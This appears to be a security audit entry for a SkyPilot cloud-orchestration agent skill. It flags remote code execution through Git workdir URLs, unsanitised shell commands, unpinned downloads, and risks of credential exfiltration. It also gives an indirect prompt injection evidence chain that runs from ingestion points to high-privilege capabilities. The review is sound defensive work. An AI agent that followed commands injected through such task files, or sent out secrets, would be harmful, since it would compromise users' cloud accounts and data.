The Agent Skills Directory

[REMOTE_CODE_EXECUTION] (HIGH): The skill supports the workdir parameter which allows pulling and executing code directly from remote Git URLs (e.g., https://github.com/user/repo.git). This pattern is highly susceptible to exploitation if an attacker can influence the URL provided to the agent.
[COMMAND_EXECUTION] (HIGH): The skill documentation and configuration examples extensively use the run block to execute arbitrary shell commands (e.g., bash, python, torchrun) on cloud instances. There is no evidence of sanitization or boundary markers for these commands.
[EXTERNAL_DOWNLOADS] (HIGH): The skill instructs the agent to install the skypilot package and its cloud-specific dependencies at runtime via pip install. While skypilot is a known tool, the lack of pinned versions or integrity checks for these external dependencies poses a risk of supply chain attacks.
[DATA_EXFILTRATION] (MEDIUM): The skill manages cloud credentials (sky check) and handles sensitive environment variables/secrets (e.g., HF_TOKEN, WANDB_API_KEY). It also facilitates network operations via cloud storage mounts (S3, GCS), which could be used to exfiltrate local data to attacker-controlled cloud buckets.
[INDIRECT PROMPT INJECTION] (HIGH): (Evidence Chain)
Ingestion points: Untrusted data enters via the workdir URL, file_mounts sources, and run command blocks in YAML task definitions.
Boundary markers: Absent. There are no delimiters or instructions to ignore embedded commands within the processed task files.
Capability inventory: High-privilege capabilities including arbitrary command execution on cloud clusters, file system modification via mounts, and network access to multiple cloud providers.
Sanitization: Absent. The skill does not validate or sanitize the shell scripts or remote sources before passing them to the SkyPilot CLI.

skypilot-multi-cloud-orchestration